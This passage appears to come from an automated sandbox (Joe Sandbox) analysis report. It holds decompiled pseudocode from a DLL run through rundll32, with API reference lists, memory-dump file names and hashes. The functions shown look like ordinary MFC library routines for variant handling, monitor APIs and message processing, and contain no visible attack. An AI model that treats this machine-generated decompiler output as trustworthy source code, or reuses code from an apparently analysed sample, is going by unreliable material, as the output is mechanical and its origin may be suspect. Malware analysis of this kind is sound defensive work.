                                                                                                                          						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
                                                                                                                          						while(1) {
                                                                                                                          							_t319 =  *_t295;
                                                                                                                          							if( *_t295 == 0) {
                                                                                                                          								goto L46;
                                                                                                                          							}
                                                                                                                          							_t230 =  *_t295;
                                                                                                                          							__eflags = _t230 - 8;
                                                                                                                          							if(_t230 == 8) {
                                                                                                                          								L43:
                                                                                                                          								__imp__#9(_t293);
                                                                                                                          								L44:
                                                                                                                          								_t293 = _t293 - 0x10;
                                                                                                                          								_t295 =  &(_t295[1]);
                                                                                                                          								__eflags = _t295;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							__eflags = _t230 - 0xe;
                                                                                                                          							if(_t230 != 0xe) {
                                                                                                                          								goto L44;
                                                                                                                          							}
                                                                                                                          							goto L43;
                                                                                                                          						}
                                                                                                                          						goto L46;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t290 = 0x10;
                                                                                                                          					_t291 = _t194 * _t290 >> 0x20;
                                                                                                                          					_t297 = E100144EC(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
                                                                                                                          					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
                                                                                                                          					E10030030(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
                                                                                                                          					_t236 =  *(_t300 + 0x18);
                                                                                                                          					_t277 =  *(_t300 - 0x4c) << 4;
                                                                                                                          					_t302 = _t302 + 0x10;
                                                                                                                          					_t36 = _t277 - 0x10; // -16
                                                                                                                          					_t278 = _t297 + _t36;
                                                                                                                          					 *(_t300 - 0x14) = _t236;
                                                                                                                          					 *(_t300 - 0x10) = _t278;
                                                                                                                          					if( *_t236 == 0) {
                                                                                                                          						goto L37;
                                                                                                                          					}
                                                                                                                          					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
                                                                                                                          					_t299 =  &(_t278[4]);
                                                                                                                          					_t258 = _t237 - 4;
                                                                                                                          					 *(_t300 - 0x1c) = _t299;
                                                                                                                          					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
                                                                                                                          					do {
                                                                                                                          						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
                                                                                                                          						_t279 =  *(_t300 - 0x10);
                                                                                                                          						 *_t279 = _t240;
                                                                                                                          						if((_t240 & 0x00000040) != 0) {
                                                                                                                          							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
                                                                                                                          						}
                                                                                                                          						_t241 =  *_t279 & 0x0000ffff;
                                                                                                                          						_t313 = _t241 - 0x4002;
                                                                                                                          						if(_t313 > 0) {
                                                                                                                          							_t242 = _t241 - 0x4003;
                                                                                                                          							__eflags = _t242 - 0x12;
                                                                                                                          							if(__eflags > 0) {
                                                                                                                          								goto L35;
                                                                                                                          							}
                                                                                                                          							switch( *((intOrPtr*)(_t242 * 4 +  &M1002E08D))) {
                                                                                                                          								case 0:
                                                                                                                          									goto L34;
                                                                                                                          								case 1:
                                                                                                                          									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                          									_t258 = _t258 + _t293;
                                                                                                                          									_t244 =  *_t258;
                                                                                                                          									asm("sbb ecx, ecx");
                                                                                                                          									 *_t244 =  ~( *_t244) & 0x0000ffff;
                                                                                                                          									 *_t299 = _t244;
                                                                                                                          									_t245 = E1002CA61(_t300 - 0x34, _t299, _t244, _t244, 0);
                                                                                                                          									 *(_t300 - 4) = 3;
                                                                                                                          									E1002CE83(_t300 - 0x68, _t291, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
                                                                                                                          									__eflags =  *(_t300 - 0x2c);
                                                                                                                          									 *(_t300 - 4) = 1;
                                                                                                                          									if(__eflags != 0) {
                                                                                                                          										_push( *((intOrPtr*)(_t300 - 0x34)));
                                                                                                                          										E10014517(_t258, _t291, _t293, _t299, __eflags);
                                                                                                                          									}
                                                                                                                          									goto L35;
                                                                                                                          								case 2:
                                                                                                                          									goto L35;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							if(_t313 == 0) {
                                                                                                                          								L34:
                                                                                                                          								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                          								_t258 = _t258 + _t293;
                                                                                                                          								__eflags = _t258;
                                                                                                                          								 *_t299 =  *_t258;
                                                                                                                          								goto L35;
                                                                                                                          							}
                                                                                                                          							_t250 = _t241;
                                                                                                                          							if(_t250 > 0x13) {
                                                                                                                          								goto L35;
                                                                                                                          							}
                                                                                                                          							switch( *((intOrPtr*)(_t250 * 4 +  &M1002E03D))) {
                                                                                                                          								case 0:
                                                                                                                          									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                          									__ebx = __ebx + __edi;
                                                                                                                          									__ax =  *__ebx;
                                                                                                                          									goto L28;
                                                                                                                          								case 1:
                                                                                                                          									goto L34;
                                                                                                                          								case 2:
                                                                                                                          									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                                          									__eax =  *(__ebp + 0x1c);
                                                                                                                          									__ebx =  &(__ebx[2]);
                                                                                                                          									 *__esi =  *( *(__ebp + 0x1c));
                                                                                                                          									goto L35;
                                                                                                                          								case 3:
                                                                                                                          									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                                          									__eax =  *(__ebp + 0x1c);
                                                                                                                          									__ebx =  &(__ebx[2]);
                                                                                                                          									 *__esi =  *( *(__ebp + 0x1c));
                                                                                                                          									goto L35;
                                                                                                                          								case 4:
                                                                                                                          									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                          									__ebx = __ebx + __edi;
                                                                                                                          									__eax =  *__ebx;
                                                                                                                          									goto L17;
                                                                                                                          								case 5:
                                                                                                                          									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                          									__ebx = __ebx + __edi;
                                                                                                                          									__eax =  *__ebx;
                                                                                                                          									_push(__eax);
                                                                                                                          									 *(__ebp - 0x1c) = __eax;
                                                                                                                          									__imp__#2();
                                                                                                                          									__eflags =  *(__ebp - 0x1c);
                                                                                                                          									 *__esi = __eax;
                                                                                                                          									if(__eflags == 0) {
                                                                                                                          										goto L35;
                                                                                                                          									}
                                                                                                                          									__eflags = __eax;
                                                                                                                          									if(__eflags != 0) {
                                                                                                                          										goto L35;
                                                                                                                          									}
                                                                                                                          									goto L23;
                                                                                                                          								case 6:
                                                                                                                          									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                          									__ebx = __ebx + __edi;
                                                                                                                          									 *__ebx =  ~( *__ebx);
                                                                                                                          									asm("sbb eax, eax");
                                                                                                                          									L28:
                                                                                                                          									 *__esi = __ax;
                                                                                                                          									goto L35;
                                                                                                                          								case 7:
                                                                                                                          									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
                                                                                                                          									__edi =  *(__ebp - 0x10);
                                                                                                                          									__ebx =  &(__ebx[1]);
                                                                                                                          									__esi =  *__ebx;
                                                                                                                          									asm("movsd");
                                                                                                                          									asm("movsd");
                                                                                                                          									asm("movsd");
                                                                                                                          									asm("movsd");
                                                                                                                          									__esi =  *(__ebp - 0x1c);
                                                                                                                          									_push(4);
                                                                                                                          									_pop(__edi);
                                                                                                                          									goto L35;
                                                                                                                          								case 8:
                                                                                                                          									L24:
                                                                                                                          									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                          									__ebx = __ebx + __edi;
                                                                                                                          									__eax =  *__ebx;
                                                                                                                          									_push(__eax);
                                                                                                                          									__ecx = __ebp - 0x18;
                                                                                                                          									 *(__ebp - 0x1c) = __eax;
                                                                                                                          									__eax = E100200B9(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                                          									_push( *(__ebp - 0x18));
                                                                                                                          									 *((char*)(__ebp - 4)) = 2;
                                                                                                                          									__imp__#2();
                                                                                                                          									__eflags =  *(__ebp - 0x1c);
                                                                                                                          									 *__esi = __eax;
                                                                                                                          									if( *(__ebp - 0x1c) == 0) {
                                                                                                                          										L26:
                                                                                                                          										__ecx =  *(__ebp - 0x18);
                                                                                                                          										__eax =  *(__ebp - 0x10);
                                                                                                                          										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
                                                                                                                          										 *( *(__ebp - 0x10)) = 8;
                                                                                                                          										 *((char*)(__ebp - 4)) = 1;
                                                                                                                          										__eax = E100012C0(__ecx);
                                                                                                                          										goto L35;
                                                                                                                          									}
                                                                                                                          									__eflags = __eax;
                                                                                                                          									if(__eflags == 0) {
                                                                                                                          										L23:
                                                                                                                          										__eax = E100201BD(__ecx);
                                                                                                                          										goto L24;
                                                                                                                          									}
                                                                                                                          									goto L26;
                                                                                                                          								case 9:
                                                                                                                          									goto L35;
                                                                                                                          								case 0xa:
                                                                                                                          									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                          									_t258 = _t258 + _t293;
                                                                                                                          									 *_t299 =  *_t258;
                                                                                                                          									goto L35;
                                                                                                                          								case 0xb:
                                                                                                                          									__eax =  *(__ebp + 0x1c);
                                                                                                                          									__eax =  *(__ebp + 0x1c) + 8;
                                                                                                                          									 *(__ebp + 0x1c) = __eax;
                                                                                                                          									__ebx =  &(__ebx[2]);
                                                                                                                          									__eflags = __ebx;
                                                                                                                          									L17:
                                                                                                                          									__ecx =  *__eax;
                                                                                                                          									 *__esi = __ecx;
                                                                                                                          									 *(__esi + 4) = __eax;
                                                                                                                          									goto L35;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L35:
                                                                                                                          						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
                                                                                                                          						_t299 = _t299 - 0x10;
                                                                                                                          						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
                                                                                                                          						 *(_t300 - 0x1c) = _t299;
                                                                                                                          					} while ( *( *(_t300 - 0x14)) != 0);
                                                                                                                          					_t257 = 0;
                                                                                                                          					goto L37;
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          0x1002de71
                                                                                                                          0x1002de71
                                                                                                                          0x1002de74
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002de5c
                                                                                                                          0x1002de5e
                                                                                                                          0x1002de60
                                                                                                                          0x1002de66
                                                                                                                          0x1002de67
                                                                                                                          0x1002de6d
                                                                                                                          0x1002de6d
                                                                                                                          0x1002de70
                                                                                                                          0x1002de70
                                                                                                                          0x00000000
                                                                                                                          0x1002de70
                                                                                                                          0x1002de62
                                                                                                                          0x1002de64
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002de64
                                                                                                                          0x00000000
                                                                                                                          0x1002de71
                                                                                                                          0x1002dbd0
                                                                                                                          0x1002dbd4
                                                                                                                          0x1002dbd5
                                                                                                                          0x1002dbe4
                                                                                                                          0x1002dbef
                                                                                                                          0x1002dbf2
                                                                                                                          0x1002dbfa
                                                                                                                          0x1002dbfd
                                                                                                                          0x1002dc00
                                                                                                                          0x1002dc06
                                                                                                                          0x1002dc06
                                                                                                                          0x1002dc0a
                                                                                                                          0x1002dc0d
                                                                                                                          0x1002dc10
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dc16
                                                                                                                          0x1002dc1b
                                                                                                                          0x1002dc1e
                                                                                                                          0x1002dc24
                                                                                                                          0x1002dc27
                                                                                                                          0x1002dc2a
                                                                                                                          0x1002dc2d
                                                                                                                          0x1002dc33
                                                                                                                          0x1002dc36
                                                                                                                          0x1002dc39
                                                                                                                          0x1002dc43
                                                                                                                          0x1002dc43
                                                                                                                          0x1002dc46
                                                                                                                          0x1002dc4e
                                                                                                                          0x1002dc50
                                                                                                                          0x1002dd6d
                                                                                                                          0x1002dd72
                                                                                                                          0x1002dd75
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dd77
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dd7e
                                                                                                                          0x1002dd81
                                                                                                                          0x1002dd83
                                                                                                                          0x1002dd89
                                                                                                                          0x1002dd93
                                                                                                                          0x1002dd9a
                                                                                                                          0x1002dd9c
                                                                                                                          0x1002dda8
                                                                                                                          0x1002ddac
                                                                                                                          0x1002ddb1
                                                                                                                          0x1002ddb5
                                                                                                                          0x1002ddb9
                                                                                                                          0x1002ddbb
                                                                                                                          0x1002ddbe
                                                                                                                          0x1002ddc3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dc56
                                                                                                                          0x1002dc56
                                                                                                                          0x1002ddc6
                                                                                                                          0x1002ddc6
                                                                                                                          0x1002ddc9
                                                                                                                          0x1002ddc9
                                                                                                                          0x1002ddcd
                                                                                                                          0x00000000
                                                                                                                          0x1002ddcd
                                                                                                                          0x1002dc5d
                                                                                                                          0x1002dc61
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dc67
                                                                                                                          0x00000000
                                                                                                                          0x1002dc7c
                                                                                                                          0x1002dc7f
                                                                                                                          0x1002dc81
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dca4
                                                                                                                          0x1002dca8
                                                                                                                          0x1002dcad
                                                                                                                          0x1002dcb0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dcb7
                                                                                                                          0x1002dcbb
                                                                                                                          0x1002dcc0
                                                                                                                          0x1002dcc3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dcca
                                                                                                                          0x1002dccd
                                                                                                                          0x1002dccf
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dcd3
                                                                                                                          0x1002dcd6
                                                                                                                          0x1002dcd8
                                                                                                                          0x1002dcda
                                                                                                                          0x1002dcdb
                                                                                                                          0x1002dcde
                                                                                                                          0x1002dce4
                                                                                                                          0x1002dce8
                                                                                                                          0x1002dcea
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dcf0
                                                                                                                          0x1002dcf2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dd45
                                                                                                                          0x1002dd48
                                                                                                                          0x1002dd4c
                                                                                                                          0x1002dd4e
                                                                                                                          0x1002dd50
                                                                                                                          0x1002dd50
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dd55
                                                                                                                          0x1002dd59
                                                                                                                          0x1002dd5c
                                                                                                                          0x1002dd5f
                                                                                                                          0x1002dd61
                                                                                                                          0x1002dd62
                                                                                                                          0x1002dd63
                                                                                                                          0x1002dd64
                                                                                                                          0x1002dd65
                                                                                                                          0x1002dd68
                                                                                                                          0x1002dd6a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dcfd
                                                                                                                          0x1002dcfd
                                                                                                                          0x1002dd00
                                                                                                                          0x1002dd02
                                                                                                                          0x1002dd04
                                                                                                                          0x1002dd05
                                                                                                                          0x1002dd08
                                                                                                                          0x1002dd0b
                                                                                                                          0x1002dd10
                                                                                                                          0x1002dd13
                                                                                                                          0x1002dd17
                                                                                                                          0x1002dd1d
                                                                                                                          0x1002dd21
                                                                                                                          0x1002dd23
                                                                                                                          0x1002dd29
                                                                                                                          0x1002dd29
                                                                                                                          0x1002dd2c
                                                                                                                          0x1002dd2f
                                                                                                                          0x1002dd32
                                                                                                                          0x1002dd37
                                                                                                                          0x1002dd3b
                                                                                                                          0x00000000
                                                                                                                          0x1002dd3b
                                                                                                                          0x1002dd25
                                                                                                                          0x1002dd27
                                                                                                                          0x1002dcf8
                                                                                                                          0x1002dcf8
                                                                                                                          0x00000000
                                                                                                                          0x1002dcf8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dc6e
                                                                                                                          0x1002dc71
                                                                                                                          0x1002dc75
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dc89
                                                                                                                          0x1002dc8c
                                                                                                                          0x1002dc8f
                                                                                                                          0x1002dc92
                                                                                                                          0x1002dc92
                                                                                                                          0x1002dc95
                                                                                                                          0x1002dc95
                                                                                                                          0x1002dc97
                                                                                                                          0x1002dc9c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dc67
                                                                                                                          0x1002ddcf
                                                                                                                          0x1002ddcf
                                                                                                                          0x1002ddd3
                                                                                                                          0x1002ddd6
                                                                                                                          0x1002dddf
                                                                                                                          0x1002dddf
                                                                                                                          0x1002dde8
                                                                                                                          0x00000000
                                                                                                                          0x1002dde8

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4128688680-0
                                                                                                                          • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                          • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                          • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                          • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 97%
                                                                                                                          			E10018B59() {
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __esi;
                                                                                                                          				struct HINSTANCE__* _t5;
                                                                                                                          				_Unknown_base(*)()* _t6;
                                                                                                                          				_Unknown_base(*)()* _t7;
                                                                                                                          				_Unknown_base(*)()* _t8;
                                                                                                                          				_Unknown_base(*)()* _t9;
                                                                                                                          				_Unknown_base(*)()* _t10;
                                                                                                                          				_Unknown_base(*)()* _t11;
                                                                                                                          				_Unknown_base(*)()* _t12;
                                                                                                                          				struct HINSTANCE__* _t18;
                                                                                                                          				void* _t20;
                                                                                                                          				intOrPtr _t23;
                                                                                                                          				_Unknown_base(*)()* _t24;
                                                                                                                          
                                                                                                                          				_t23 =  *0x100572e4; // 0x0
                                                                                                                          				if(_t23 == 0) {
                                                                                                                          					_push(_t20);
                                                                                                                          					 *0x100572e8 = E10018B01(0, _t20, __eflags);
                                                                                                                          					_t18 = GetModuleHandleA("USER32");
                                                                                                                          					__eflags = _t18;
                                                                                                                          					if(_t18 == 0) {
                                                                                                                          						L12:
                                                                                                                          						 *0x100572c8 = 0;
                                                                                                                          						 *0x100572cc = 0;
                                                                                                                          						 *0x100572d0 = 0;
                                                                                                                          						 *0x100572d4 = 0;
                                                                                                                          						 *0x100572d8 = 0;
                                                                                                                          						 *0x100572dc = 0;
                                                                                                                          						 *0x100572e0 = 0;
                                                                                                                          						_t5 = 0;
                                                                                                                          					} else {
                                                                                                                          						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
                                                                                                                          						__eflags = _t6;
                                                                                                                          						 *0x100572c8 = _t6;
                                                                                                                          						if(_t6 == 0) {
                                                                                                                          							goto L12;
                                                                                                                          						} else {
                                                                                                                          							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
                                                                                                                          							__eflags = _t7;
                                                                                                                          							 *0x100572cc = _t7;
                                                                                                                          							if(_t7 == 0) {
                                                                                                                          								goto L12;
                                                                                                                          							} else {
                                                                                                                          								_t8 = GetProcAddress(_t18, "MonitorFromRect");
                                                                                                                          								__eflags = _t8;
                                                                                                                          								 *0x100572d0 = _t8;
                                                                                                                          								if(_t8 == 0) {
                                                                                                                          									goto L12;
                                                                                                                          								} else {
                                                                                                                          									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
                                                                                                                          									__eflags = _t9;
                                                                                                                          									 *0x100572d4 = _t9;
                                                                                                                          									if(_t9 == 0) {
                                                                                                                          										goto L12;
                                                                                                                          									} else {
                                                                                                                          										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
                                                                                                                          										__eflags = _t10;
                                                                                                                          										 *0x100572dc = _t10;
                                                                                                                          										if(_t10 == 0) {
                                                                                                                          											goto L12;
                                                                                                                          										} else {
                                                                                                                          											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
                                                                                                                          											__eflags = _t11;
                                                                                                                          											 *0x100572d8 = _t11;
                                                                                                                          											if(_t11 == 0) {
                                                                                                                          												goto L12;
                                                                                                                          											} else {
                                                                                                                          												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
                                                                                                                          												__eflags = _t12;
                                                                                                                          												 *0x100572e0 = _t12;
                                                                                                                          												if(_t12 == 0) {
                                                                                                                          													goto L12;
                                                                                                                          												} else {
                                                                                                                          													_t5 = 1;
                                                                                                                          													__eflags = 1;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					 *0x100572e4 = 1;
                                                                                                                          					return _t5;
                                                                                                                          				} else {
                                                                                                                          					_t24 =  *0x100572d8; // 0x0
                                                                                                                          					return 0 | _t24 != 0x00000000;
                                                                                                                          				}
                                                                                                                          			}


















                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                          • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                          • API String ID: 667068680-68207542
                                                                                                                          • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                          • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
                                                                                                                          • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                          • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E1002A778(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v24;
                                                                                                                          				int _v28;
                                                                                                                          				intOrPtr _v32;
                                                                                                                          				intOrPtr _v36;
                                                                                                                          				intOrPtr _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				struct HWND__* _v52;
                                                                                                                          				signed int _t139;
                                                                                                                          				signed int _t141;
                                                                                                                          				void* _t142;
                                                                                                                          				signed int _t146;
                                                                                                                          				signed int _t149;
                                                                                                                          				intOrPtr _t150;
                                                                                                                          				signed int _t152;
                                                                                                                          				signed char _t153;
                                                                                                                          				signed int _t154;
                                                                                                                          				signed int _t155;
                                                                                                                          				int _t156;
                                                                                                                          				signed int _t161;
                                                                                                                          				signed int _t165;
                                                                                                                          				void* _t167;
                                                                                                                          				signed char _t171;
                                                                                                                          				signed int _t172;
                                                                                                                          				signed int _t173;
                                                                                                                          				signed int _t174;
                                                                                                                          				signed char _t182;
                                                                                                                          				intOrPtr _t183;
                                                                                                                          				signed int _t184;
                                                                                                                          				short _t188;
                                                                                                                          				signed int _t189;
                                                                                                                          				signed int _t190;
                                                                                                                          				signed int _t191;
                                                                                                                          				signed int _t195;
                                                                                                                          				signed int _t198;
                                                                                                                          				signed char _t199;
                                                                                                                          				signed int _t200;
                                                                                                                          				signed int _t201;
                                                                                                                          				short _t204;
                                                                                                                          				signed int _t206;
                                                                                                                          				signed int _t207;
                                                                                                                          				signed int _t208;
                                                                                                                          				signed int _t209;
                                                                                                                          				void* _t211;
                                                                                                                          				signed int _t215;
                                                                                                                          				signed int _t216;
                                                                                                                          				struct HWND__* _t217;
                                                                                                                          				struct tagMSG* _t221;
                                                                                                                          				intOrPtr _t224;
                                                                                                                          				void* _t231;
                                                                                                                          				struct tagMSG* _t240;
                                                                                                                          				signed int _t242;
                                                                                                                          				int _t243;
                                                                                                                          				signed int _t244;
                                                                                                                          				long _t247;
                                                                                                                          				intOrPtr _t249;
                                                                                                                          				signed int _t251;
                                                                                                                          				signed int _t254;
                                                                                                                          				signed int _t255;
                                                                                                                          				signed int _t256;
                                                                                                                          				signed int _t257;
                                                                                                                          				signed int _t258;
                                                                                                                          				void* _t260;
                                                                                                                          				void* _t262;
                                                                                                                          
                                                                                                                          				_t232 = __ecx;
                                                                                                                          				_t260 = _t262;
                                                                                                                          				_push(__ecx);
                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                          				_push(__ebx);
                                                                                                                          				_push(__esi);
                                                                                                                          				_push(__edi);
                                                                                                                          				_t139 = E1002A5D5(_a4, _a8);
                                                                                                                          				_t238 = _t139;
                                                                                                                          				if(_t139 == 0) {
                                                                                                                          					_t232 = _a4;
                                                                                                                          					_t231 = E100199B2(_a4);
                                                                                                                          					if(_t231 != 0) {
                                                                                                                          						_t221 =  *((intOrPtr*)(_t231 + 0x44));
                                                                                                                          						_a8 = _t221;
                                                                                                                          						if(_t221 != 0) {
                                                                                                                          							while(1) {
                                                                                                                          								_t9 = _t231 + 0x40; // 0x40
                                                                                                                          								_t232 = _t9;
                                                                                                                          								_t258 =  *(E10017B95( &_a8));
                                                                                                                          								_t224 =  *((intOrPtr*)(_t258 + 4));
                                                                                                                          								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
                                                                                                                          									if(_a8 != 0) {
                                                                                                                          										continue;
                                                                                                                          									} else {
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								goto L10;
                                                                                                                          							}
                                                                                                                          							_t238 = _t258;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L10:
                                                                                                                          				_t247 = 0;
                                                                                                                          				while(1) {
